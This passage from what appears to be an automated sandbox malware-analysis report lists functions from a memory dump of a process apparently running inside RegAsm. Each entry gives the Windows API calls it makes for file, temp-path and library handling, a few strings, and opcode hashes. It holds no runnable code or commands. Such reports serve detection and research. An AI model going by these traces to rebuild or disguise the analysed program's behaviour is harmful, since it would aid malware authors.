                                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                  Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                  • String ID: }A
                                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                  Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                  • Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                  • Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                  Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                  Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID: BINARY
                                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                  Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                  • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                  • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 568699880-0
                                                                                                                                  • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                  • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                  • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                  • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                  • String ID: /stext
                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                  Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1023896661-0
                                                                                                                                  • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                  • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                  • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                  • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2445788494-0
                                                                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                  Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: malloc
                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                  Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                  Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                  Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                  • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                  Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                  • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                  • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                  • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2154303073-0
                                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4232544981-0
                                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                  Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 514040917-0
                                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
